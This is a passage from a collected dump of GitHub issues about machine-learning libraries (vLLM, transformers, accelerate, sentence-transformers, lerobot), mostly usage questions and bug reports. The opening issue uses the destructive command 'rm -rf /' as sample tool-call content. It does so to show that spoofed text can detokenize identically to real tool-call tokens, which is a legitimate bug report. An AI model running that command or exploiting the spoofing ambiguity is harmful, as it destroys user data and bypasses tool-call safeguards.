\"rm -rf /\", \"\"]` \n`[\"<\", \"tool \", \"call \", \"start\", \">\", \"rm -rf /\", \"<\", \"tool \", \"call \", \"end\", \">\"]` \n\nThey both are detokenized to the same \"rm -rf .\". 
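A minimal sketch of the collision (the token strings below are hypothetical stand-ins, not the real control tokens of any particular tokenizer):

```python
# Two different token sequences: one uses a real control token, the other
# spells the same thing out as ordinary text pieces.
real_control = ["<tool_call>", "rm -rf /", "</tool_call>"]
plain_text = ["<", "tool", "_call", ">", "rm -rf /", "<", "/tool", "_call", ">"]

# After detokenization they are byte-identical, so a text-based parser has no
# way to tell a genuine tool call from text that merely looks like one.
assert "".join(real_control) == "".join(plain_text)
```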
The [parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) function has to return the same output for both of them.\n\n### Expected behavior\n\n[parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) must return tool call for `[\"\", \"rm -rf /\", \"\"]` but a plain text for `[\"<\", \"tool \", \"call \", \"start\", \">\", \"rm -rf /\", \"<\", \"tool \", \"call \", \"end\", \">\"]` .", "url": "https://github.com/huggingface/transformers/issues/42698", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T12:20:39Z", "updated_at": "2025-12-08T15:59:19Z", "comments": 2, "user": "kibergus" }, { "repo": "vllm-project/vllm", "number": 30248, "title": "[Feature]: any plan to support Relaxed Acceptance in v1?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n[NV Relaxed Acceptance](https://github.com/NVIDIA/TensorRT-LLM/blob/main/docs/source/blogs/tech_blog/blog2_DeepSeek_R1_MTP_Implementation_and_Optimization.md#relaxed-acceptance)\nThere are PRs ([vllm](https://github.com/vllm-project/vllm/pull/21506), [vllm](https://github.com/vllm-project/vllm/pull/22238), [sglang](https://github.com/sgl-project/sglang/pull/7702), [sglang](https://github.com/sgl-project/sglang/pull/8068)) in both sglang and vllm. However, none of them has been merged. What's the story behind this?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30248", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-08T08:45:20Z", "updated_at": "2025-12-09T10:18:22Z", "comments": 4, "user": "chengda-wu" }, { "repo": "vllm-project/vllm", "number": 30246, "title": "[Usage]: How to disable reasoning for gpt-oss-120b", "body": "### Your current environment\n\n```\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.13 (main, Jun 5 2025, 13:12:00) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-160-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\nGPU 4: NVIDIA L20\nGPU 5: NVIDIA L20\nGPU 6: NVIDIA L20\nGPU 7: NVIDIA L20\n\nNvidia driver version : 535.274.02\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU 
Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 96\nOn-line CPU(s) list: 0-95\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 5418Y\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 24\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 2.3 MiB (48 instances)\nL1i cache: 1.5 MiB (48 instances)\nL2 cache: 96 MiB (48 instances)\nL3 cache: 90 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-23,48-71\nNUMA node1 CPU(s): 24-47,72-95\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; PBRSB-", "url": "https://github.com/vllm-project/vllm/issues/30246", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-08T08:23:58Z", "updated_at": "2025-12-08T08:23:58Z", "comments": 0, "user": "WiiliamC" }, { "repo": "huggingface/transformers", "number": 42690, "title": "How to run Phi4MultimodalProcessor", "body": "### System Info\n\ntransformers version: 4.57.1\npython version: 3.9\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n[Phi4MultiModal example](https://huggingface.co/docs/transformers/model_doc/phi4_multimodal)\n\n### Expected behavior\n\nI just run [the 
example](https://huggingface.co/docs/transformers/model_doc/phi4_multimodal) but an error is raised.", "url": "https://github.com/huggingface/transformers/issues/42690", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T03:27:02Z", "updated_at": "2025-12-09T12:30:27Z", "user": "wcrzlh" }, { "repo": "vllm-project/vllm", "number": 30222, "title": "[Bug]: gpt-oss response api: streaming + code interpreter has bugs", "body": "### Your current environment\n\n
_No response_
\n\n\n### \ud83d\udc1b Describe the bug\n\nGpt-oss in streaming mode cannot see internal code interpreter output \n\nthe problem is with https://github.com/vllm-project/vllm/blob/af0444bf40b7db2f3fb9fe1508d25ceba24cac87/vllm/entrypoints/context.py#L720-L732\n\nI can see that tool call result is not appended to message.\n\n\nMy basic testing code looks like this\n```python\nstream = client.responses.create(\n model=\"vllm-model\",\n input=[{\"role\": \"user\", \"content\": \"what is 123^456 mod 1000000007? use python tool to solve this problem\"}],\n tools=[{\"type\": \"code_interpreter\", \"container\": {\"type\": \"auto\"}}],\n max_output_tokens=32768,\n temperature=1.0,\n reasoning={\"effort\": \"high\"},\n stream=True,\n instructions=system_prompt,\n extra_body={\n \"min_p\": 0.02,\n \"stop_token_ids\": stop_token_ids,\n \"chat_template_kwargs\": {\"enable_thinking\": True},\n }\n)\n\ncurrent_tool_code = \"\"\n\nfor event in stream:\n generation_idx += 1\n\n # Reasoning text\n if event.type == \"response.reasoning_text.delta\":\n delta = event.delta\n reasoning_response += delta\n text_response += delta\n print(delta, end=\"\", flush=True) # Real-time output\n\n # Message text\n elif event.type == \"response.output_text.delta\":\n delta = event.delta\n text_response += delta\n print(delta, end=\"\", flush=True)\n\n # Tool call events\n elif event.type == \"response.code_interpreter_call_code.delta\":\n current_tool_code += event.delta\n\n elif event.type == \"response.code_interpreter_call_code.done\":\n tool_calls_log.append({\n \"code\": event.code,\n \"type\": \"code_interpreter\"\n })\n current_tool_code = \"\"\n print(event.code)\n\n elif event.type == \"response.completed\":\n # Final event - could extract full response here if needed\n pass\n```\n\n\nmodel response (ignore the pretty looking, it is just another version for visualization)\n```bash\n============================================================\n\n\n\ud83d\udcad REASONING:\nWe need to compute 123^456 mod 1000000007. It's a big power but within modular exponent. We can compute quickly with pow in Python: pow(123, 456, 1000000007). But the prompt says please use python tool to solve this problem. We'll use python.\n\ud83d\udcdd CODE EXECUTED:\npow(123, 456, 1000000007)\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\nLet's see result.\n\n\ud83d\udcad REASONING:\nIt printed something? Wait, no output visible yet. We may need to capture the output. Let's assign.\n\ud83d\udcdd CODE EXECUTED:\nresult = pow(123, 456, 1000000007)\nresult\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\nIt returned something? Let's see.\n\n\ud83d\udcad REASONING:\nIt didn't print, but the value is stored. We should print the result.\n\ud83d\udcdd CODE EXECUTED:\nprint(result)\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\n565291922\nSo answer is 565291922. 
Provide box.\n\n\ud83d\udcc4 FINAL ANSWER:\nThe value of \\(123^{456} \\bmod 1000000007\\) is \n\\[\n\\boxed{565291922}\n\\]\n============================================================\n\u2705 RESPONSE COMPLETED\nTool output tokens: 82\n\n============================================================\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30222", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T01:32:35Z", "updated_at": "2025-12-08T09:49:55Z", "comments": 4, "user": "jordane95" }, { "repo": "vllm-project/vllm", "number": 30211, "title": "[Bug]: How to make vLLM support multi stream torch compile and each stream capture cuda graph.", "body": "### Your current environment\n\n
_No response_
\n\n\n### \ud83d\udc1b Describe the bug\n\nSGLang now supports multi-stream torch compile, with each stream capturing its own CUDA graph. The code link is:\n\nhttps://github.com/sgl-project/sglang/blob/main/python/sglang/srt/model_executor/cuda_graph_runner.py#L500-#L506\n\nI want to make vLLM support that. My code on vLLM bypasses the vLLM backend and makes it work like SGLang:\n\n```\nimport torch._dynamo.config\nimport torch._inductor.config\n\ntorch._inductor.config.coordinate_descent_tuning = True\ntorch._inductor.config.triton.unique_kernel_names = True\ntorch._inductor.config.freezing = True \ntorch._inductor.config.fx_graph_cache = False # Experimental feature to reduce compilation times, will be on by default in future\n\nfrom vllm.model_executor.custom_op import CustomOp\n\ndef _to_torch(model: torch.nn.Module, reverse: bool, num_tokens: int):\n for sub in model._modules.values():\n # sub.enter_torch_compile(num_tokens=num_tokens)\n # if isinstance(sub, torch.nn.Module):\n # _to_torch(sub, reverse, num_tokens)\n if isinstance(sub, CustomOp):\n if reverse:\n sub.leave_torch_compile()\n else:\n sub.enter_torch_compile(num_tokens=num_tokens)\n if isinstance(sub, torch.nn.Module):\n _to_torch(sub, reverse, num_tokens)\n\n\n@contextmanager\ndef patch_model(\n model: torch.nn.Module,\n enable_compile: bool,\n num_tokens: int,\n # tp_group: GroupCoordinator,\n):\n \"\"\"Patch the model to make it compatible with torch.compile\"\"\"\n backup_ca_comm = None\n current_stream = torch.cuda.current_stream()\n with torch.cuda.stream(current_stream):\n print(f\"patch_model, the current_stream:{current_stream.cuda_stream}\", flush = True)\n try:\n if enable_compile:\n _to_torch(model, reverse=False, num_tokens=num_tokens)\n # backup_ca_comm = tp_group.ca_comm\n # Use custom-allreduce here.\n # We found the custom allreduce is much faster than the built-in allreduce in torch,\n # even with ENABLE_INTRA_NODE_COMM=1.\n # tp_group.ca_comm = None\n wrapped_forward = model.forward # \ud83d\udd25 only this line is changed\n with torch.no_grad():\n compiled = torch.compile(wrapped_forward, mode=\"max-autotune-no-cudagraphs\", dynamic=False)\n yield compiled \n # yield torch.compile(\n # model.forward,\n # mode=\"max-autotune-no-cudagraphs\",\n # dynamic=False,)\n # yield torch.compile(\n # torch.no_grad()(model.forward),\n # mode=\"reduce-overhead\",\n # dynamic=_is_hip and get_bool_env_var(\"SGLANG_TORCH_DYNAMIC_SHAPE\"),\n # )\n else:\n yield model.forward\n finally:\n if enable_compile:\n _to_torch(model, reverse=True, num_tokens=num_tokens)\n\n\n \n @torch.inference_mode()\n def _my_dummy_run(\n self,\n num_tokens: int,\n run_decode_phase:bool=False,\n stream_idx: int = 0,\n ) -> torch.Tensor:\n # Set num_scheduled_tokens based on num_tokens and max_num_seqs\n # for dummy run with LoRA so that the num_reqs collectively\n # has num_tokens in total.\n with torch.cuda.stream(torch.cuda.current_stream()):\n assert num_tokens <= self.scheduler_config.max_num_batched_tokens\n max_num_reqs = self.scheduler_config.max_num_seqs\n num_reqs = max_num_reqs if num_tokens >= max_num_reqs else num_tokens\n min_tokens_per_req = num_tokens // num_reqs\n num_scheduled_tokens_list = [min_tokens_per_req] * num_reqs\n num_scheduled_tokens_list[-1] += num_tokens % num_reqs\n assert sum(num_scheduled_tokens_list) == num_tokens\n assert len(num_scheduled_tokens_list) == num_reqs\n num_scheduled_tokens = np.array(num_scheduled_tokens_list,\n dtype=np.int32)\n\n with self.maybe_dummy_run_with_lora(self.lora_config,\n 
num_scheduled_tokens):\n model = self.model\n if self.is_multimodal_model:\n input_ids = None\n inputs_embeds = self.inputs_embeds[:num_tokens]\n else:\n input_ids = self.input_ids[:num_tokens]\n inputs_embeds = None\n if self.uses_mrope:\n positions = self.mrope_positions[:, :num_tokens]\n else:\n positions = self.positions[:num_tokens]\n\n if get_pp_group().is_first_rank:\n intermediate_tensors = None\n else:\n ", "url": "https://github.com/vllm-project/vllm/issues/30211", "state": "open", "labels": [ "bug", "feature request", "nvidia" ], "created_at": "2025-12-07T15:12:04Z", "updated_at": "2025-12-15T05:39:39Z", "comments": 3, "user": "lambda7xx" }, { "repo": "vllm-project/vllm", "number": 30193, "title": "[Bug]: Behavioral Difference in hidden_states[-1] between vLLM and Transformers for Qwen3VLForConditionalGeneration", "body": "### Your current environment\n- vLLM Version: 0.11.2\n- Transformers Version: 4.57\n- Model: Qwen3VLForConditionalGeneration\n\n### \ud83d\udc1b Describe the bug\nI have observed an inconsistency in the output of the forward method for the `Qwen3VLForConditionalGeneration` class between vLLM (version 0.11.2) and Transformers (version 4.57).\n\nIn the Transformers library, the last hidden state (`outputs.hidden_states[0, -1, :]`) returned is before the final layer normalization. However, in vLLM, the returned hidden_states appears to be after the normalization is applied.\n\nIs this discrepancy an unintended bug, or is there a configuration option in vLLM to control this output behavior (e.g., to return the pre-norm hidden states)?\n\nI don't have a minimal demo, but I changed the original code to test.\n\nBecause the `forward` method of `Qwen3VLForConditionalGeneration` has the following code:\n```python\n hidden_states = self.language_model.model(\n input_ids=input_ids,\n positions=positions,\n intermediate_tensors=intermediate_tensors,\n inputs_embeds=inputs_embeds,\n # args for deepstack\n deepstack_input_embeds=deepstack_input_embeds,\n )\n```\nThe type of `self.language_model.model` is `Qwen3LLMModel`.\n\nI introduced an environment variable `LAST_HIDDEN_STATE_NOT_NORM` before the return of `Qwen3LLMModel`'s `forward` method:\n```python\n if os.environ.get(\"LAST_HIDDEN_STATE_NOT_NORM\", \"0\") == \"1\":\n return hidden_states + residual\n\n if not get_pp_group().is_last_rank:\n return IntermediateTensors(\n {\"hidden_states\": hidden_states, \"residual\": residual}\n )\n hidden_states, _ = self.norm(hidden_states, residual)\n return hidden_states\n```\n\nWhen `LAST_HIDDEN_STATE_NOT_NORM=1` is set, the hidden states output exactly matches Transformers' behavior.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30193", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-07T04:50:11Z", "updated_at": "2025-12-16T03:24:00Z", "comments": 3, "user": "guodongxiaren" }, { "repo": "huggingface/transformers", "number": 42674, "title": "Missing imports for DetrLoss and DetrHungarianMatcher", "body": "Previously, I was able to import these classes as \n```\nfrom transformers.models.detr.modeling_detr import DetrLoss, DetrObjectDetectionOutput, DetrHungarianMatcher\n```\n\nIn v4.57.3, the import fails and I also cannot find DetrLoss or DetrHungarianMatcher anywhere in the codebase. 
Have they been removed/replaced with an alternative? What is the up-to-date import?\n\nThank you for assistance / information", "url": "https://github.com/huggingface/transformers/issues/42674", "state": "open", "labels": [], "created_at": "2025-12-06T15:32:14Z", "updated_at": "2026-01-06T08:02:43Z", "comments": 1, "user": "sammlapp" }, { "repo": "vllm-project/vllm", "number": 30163, "title": "[Usage]: Help Running NVFP4 model on 2x DGX Spark with vLLM + Ray (multi-node)", "body": "### Your current environment\n\n# Help: Running NVFP4 model on 2x DGX Spark with vLLM + Ray (multi-node)\n\n## Hardware\n- **2x DGX Spark** (GB10 GPU each, sm_121a / compute capability 12.1)\n- Connected via 200GbE ConnectX-7/Ethernet\n- Driver: 580.95.05, Host CUDA: 13.0\n\n## Goal\nRun `lukealonso/GLM-4.6-NVFP4` (357B MoE model, NVFP4 quantization) across both nodes using vLLM with Ray distributed backend.\n\n## What I've Tried\n\n### 1. `nvcr.io/nvidia/vllm:25.11-py3` (NGC)\n- vLLM 0.11.0\n- **Error:** `FlashInfer kernels unavailable for ModelOptNvFp4FusedMoE on current platform`\n- NVFP4 requires vLLM 0.12.0+\n\n### 2. `vllm/vllm-openai:nightly-aarch64` (vLLM 0.11.2.dev575)\n- With `VLLM_USE_FLASHINFER_MOE_FP4=1`\n- **Error:** `ptxas fatal: Value 'sm_121a' is not defined for option 'gpu-name'`\n- Triton's bundled ptxas 12.8 doesn't support GB10\n\n### 3. `vllm/vllm-openai:v0.12.0-aarch64` (vLLM 0.12.0)\n- Fixed ptxas with symlink: `ln -sf /usr/local/cuda/bin/ptxas /usr/local/lib/python3.12/dist-packages/triton/backends/nvidia/bin/ptxas`\n- Triton compilation passes \u2705\n- **Error:** `RuntimeError: [FP4 gemm Runner] Failed to run cutlass FP4 gemm on sm120. Error: Error Internal`\n\n### 4. Tried both parallelism modes:\n- `--tensor-parallel-size 2` \u2192 same CUTLASS error\n- `--pipeline-parallel-size 2` \u2192 same CUTLASS error\n\n### 5. `--enforce-eager` flag\n- Not fully tested yet\n\n## Environment Details\n| Component | Version |\n|-----------|---------|\n| Host Driver | 580.95.05 |\n| Host CUDA | 13.0 |\n| Container CUDA | 12.9 |\n| Container ptxas | 12.9.86 (supports sm_121a \u2705) |\n| Triton bundled ptxas | 12.8 (NO sm_121a \u274c) |\n| PyTorch | 2.9.0+cu129 |\n\n## The Blocking Error\n\nvLLM correctly loads weights (41/41 shards), then during profile_run:\n\n```\nINFO [flashinfer_utils.py:289] Flashinfer TRTLLM MOE backend is only supported on SM100 and later, using CUTLASS backend instead\nINFO [modelopt.py:1142] Using FlashInfer CUTLASS kernels for ModelOptNvFp4FusedMoE.\n...\nRuntimeError: [FP4 gemm Runner] Failed to run cutlass FP4 gemm on sm120. Error: Error Internal\n```\n\nFlashInfer detects GB10 is not SM100 (B200), falls back to CUTLASS - but CUTLASS FP4 also fails.\n\n## Key Question\n\n**Are CUTLASS FP4 GEMM kernels compiled for GB10 (sm_121a)?**\n\nIs there:\n1. A vLLM build with CUTLASS kernels for sm_121?\n2. A way to force Marlin FP4 fallback on GB10?\n3. Recommended Docker image for DGX Spark + NVFP4?\n\nI see NVFP4 models tested on:\n- B200 (sm_100) \u2705\n- H100/A100 with Marlin FP4 fallback \u2705\n\nBut GB10 is **sm_121** (Blackwell desktop/workstation variant). 
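As a quick sanity check (a minimal sketch; the expected value on GB10 is an inference from the sm_121a designation, not something verified here), the compute capability PyTorch reports can be printed directly:

```python
# Print the compute capability PyTorch sees for GPU 0; on GB10 this should be
# (12, 1), i.e. sm_121, if the device really is sm_121a (assumption).
import torch

major, minor = torch.cuda.get_device_capability(0)
print(f"sm_{major}{minor}")
```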
The error says `sm120` which seems wrong - GB10 should be sm_121a.\n\n\n\n## References\n- [lukealonso/GLM-4.6-NVFP4](https://huggingface.co/lukealonso/GLM-4.6-NVFP4)\n\n- [Firworks/GLM-4.5-Air-nvfp4](https://huggingface.co/Firworks/GLM-4.5-Air-nvfp4)\n\nThanks!\n", "url": "https://github.com/vllm-project/vllm/issues/30163", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-06T00:24:52Z", "updated_at": "2025-12-07T16:22:40Z", "comments": 2, "user": "letsrock85" }, { "repo": "huggingface/accelerate", "number": 3876, "title": "Why TP can't be used with pure DP?", "body": "As per [this](https://github.com/huggingface/accelerate/blob/b9ca0de682f25f15357a3f9f1a4d94374a1d451d/src/accelerate/parallelism_config.py#L332), we cannot use TP along with pure DP (or DDP). We need to further shard the model by specifying dp_shard_size as well. Why does this limitation exist? Is it just a software limitation? \nPlease share any documentation, code references, and justification for the same.\n\nWhat should be done in order to do TP+DP?", "url": "https://github.com/huggingface/accelerate/issues/3876", "state": "open", "labels": [], "created_at": "2025-12-05T16:11:22Z", "updated_at": "2025-12-26T10:07:09Z", "comments": 3, "user": "quic-meetkuma" }, { "repo": "huggingface/lerobot", "number": 2589, "title": "Clarification on XVLA folding checkpoint", "body": "Hi Lerobot team, great work on the XVLA release!\n\nI have tried finetuning on my custom dataset and have a few clarifications:\n1. Is the [lerobot/xvla-folding](https://huggingface.co/lerobot/xvla-folding) checkpoint finetuned on [lerobot/xvla-soft-fold](https://huggingface.co/datasets/lerobot/xvla-soft-fold)? \n - I am asking this because the `info.json` files don't match (e.g. the dataset image keys are `observation.images.cam_high` whereas the checkpoint image keys are `observation.images.image`)\n - The `observation.state` shapes also do not match\n\n2. How do we finetune from a checkpoint given that the checkpoint expects different naming for the observation keys and `state` shape? Is this a custom preprocessor to remap keys or is there an arg to use?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2589", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-12-05T11:42:46Z", "updated_at": "2025-12-22T08:43:05Z", "user": "brycegoh" }, { "repo": "vllm-project/vllm", "number": 30129, "title": "[Feature]: About video input for qwen3vl", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nI tried using base64 encoding to provide video input for vllm inference, but it seems this input method is not yet supported by Qwen3VL (I've seen similar issues reported elsewhere). Currently, I can only specify parameters like fps/maximum frames and then pass the local path or URL of the video.\n\nHowever, in my scenario, my videos are not uniformly sampled; I need to manually sample them first and then input multiple frames. Is there a way to achieve this input method now?
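Roughly, I imagine something like the following offline-inference sketch (untested; it assumes `multi_modal_data` accepts a pre-sampled frame array for Qwen3VL the way it does for earlier Qwen VL models, and the prompt placeholder tokens are illustrative only):

```python
# Hypothetical sketch: decode and sample frames manually, then hand the stacked
# array to vLLM instead of a video path or URL.
import cv2
import numpy as np
from vllm import LLM, SamplingParams

def decode_frame(path: str, index: int) -> np.ndarray:
    """Decode a single frame by index using OpenCV (BGR -> RGB)."""
    cap = cv2.VideoCapture(path)
    cap.set(cv2.CAP_PROP_POS_FRAMES, index)
    ok, frame = cap.read()
    cap.release()
    assert ok, f"could not read frame {index}"
    return cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)

llm = LLM(model="Qwen/Qwen3-VL-8B-Instruct")

# Non-uniform sampling: pick arbitrary frame indices instead of a fixed fps.
frames = np.stack([decode_frame("clip.mp4", i) for i in (0, 4, 13, 40)])

out = llm.generate(
    {
        # Placeholder tokens shown here are illustrative; in practice the
        # prompt should come from the model's chat template.
        "prompt": "<|vision_start|><|video_pad|><|vision_end|>Describe the video.",
        "multi_modal_data": {"video": frames},
    },
    SamplingParams(max_tokens=128),
)
print(out[0].outputs[0].text)
```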
\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30129", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-05T10:32:06Z", "updated_at": "2025-12-19T03:32:30Z", "comments": 4, "user": "lingcco" }, { "repo": "huggingface/sentence-transformers", "number": 3585, "title": "How to choose negative instance when using MultipleNegativesRankingLoss train embedding model?", "body": "Firstly, I am still confused about how to choose negative instances when using MultipleNegativesRankingLoss. In https://github.com/huggingface/sentence-transformers/blob/main/sentence_transformers/losses/MultipleNegativesRankingLoss.py#L113\n`embeddings = [self.model(sentence_feature)[\"sentence_embedding\"] for sentence_feature in sentence_features]\n`\nI guess `embeddings` should include three parts: anchor, positive, and negative from in-batch data. However, no matter how I change the `batchsize`, I still find `len(embeddings)=2`. Does this mean that the embeddings only include two parts?\n\n\nHere is my simple training script; I didn't add a negatives column to the dataset:\n```\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\nimport json\nimport torch\nfrom sentence_transformers import (\n SentenceTransformer, \n SentenceTransformerTrainer,\n SentenceTransformerTrainingArguments,\n InputExample, \n)\nfrom sentence_transformers.losses import MultipleNegativesRankingLoss\nfrom sentence_transformers.training_args import BatchSamplers\nfrom datasets import load_dataset, Dataset\ndef train_embedding_model():\n train_epo = 3\n save_path = f\"/app/raw_model/tmp\"\n data_path = \"/app/emb_train_1205.json\"\n model = SentenceTransformer(\n \"/app/download_models/Qwen3-Embedding-0.6B\",\n model_kwargs={\n \"attn_implementation\": \"flash_attention_2\",\n \"torch_dtype\": \"auto\"\n }\n )\n model.tokenizer.padding_side = \"left\"\n model.tokenizer.pad_token = model.tokenizer.eos_token\n model.tokenizer.model_max_length = 2048\n\n dataset = load_dataset(\"json\", data_files=data_path)\n '''\n DatasetDict({\n train: Dataset({\n features: ['question', 'positive'],\n num_rows: 4000\n })\n })\n '''\n loss = MultipleNegativesRankingLoss(model)\n args = SentenceTransformerTrainingArguments(\n output_dir=save_path,\n num_train_epochs=train_epo,\n per_device_train_batch_size=8,\n per_device_eval_batch_size=1,\n learning_rate=5e-5,\n warmup_ratio=0.1,\n fp16=True, # Set to False if you get an error that your GPU can't run on FP16\n bf16=False, # Set to True if you have a GPU that supports BF16\n batch_sampler=BatchSamplers.NO_DUPLICATES, # MultipleNegativesRankingLoss benefits from no duplicate samples in a batch \n optim='adamw_torch_fused',\n logging_steps=5,\n )\n\n trainer = SentenceTransformerTrainer(\n model=model,\n args=args,\n train_dataset=dataset['train'], # dataset['train'], train_dataset\n eval_dataset=dataset['train'], # dataset['train'], train_dataset\n loss=loss,\n )\n trainer.train()\n model.save_pretrained(save_path)\n```\n\nBesides, can I manually add a list of negatives directly into the dataset while still using the MultipleNegativesRankingLoss?", "url": 
"https://github.com/huggingface/sentence-transformers/issues/3585", "state": "open", "labels": [], "created_at": "2025-12-05T09:50:26Z", "updated_at": "2025-12-09T11:49:26Z", "user": "4daJKong" }, { "repo": "vllm-project/vllm", "number": 30124, "title": "[Bug]: How to run DeepSeek-V3.2 on 2 H100 nodes?", "body": "\n\n### \ud83d\udc1b Describe the bug\n\nHow to run DeepSeek-V3.2 on 2 H100 nodes?\nI only found the cmd for H200/B200:\nvllm serve deepseek-ai/DeepSeek-V3.2 -tp 8\n\nbut it does not work in multi-node scenarios (e.g., 2 H100 nodes).\n\nSo what should the cmd be for two H100 nodes?\nhow should params --tp/--dp/--pp be configured?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30124", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-05T09:40:45Z", "updated_at": "2025-12-14T08:57:52Z", "comments": 2, "user": "XQZ1120" }, { "repo": "vllm-project/vllm", "number": 30121, "title": "[Feature]: Could you please provide Chinese documentation for vLLM? \ud83d\ude0a", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n\n\n### Alternatives\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n### Additional context\n\nCould you please provide Chinese documentation for vLLM? \ud83d\ude0a\n\n### Before submitting a new issue...\n\n- 